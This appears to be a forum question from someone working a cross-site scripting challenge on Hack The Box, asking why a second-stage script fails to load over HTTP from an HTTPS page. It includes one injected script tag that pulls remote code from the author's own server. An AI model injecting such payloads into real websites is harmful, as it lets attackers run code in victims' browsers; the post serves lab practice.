Cfrtjryk

0 I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file. The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called. Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS. The application is using HTTPS but my python server is HTTP. Is my implementation wrong or my understanding of this attack vector? <script src="http://My_ip/index.html"></script> I'm trying to then fetch this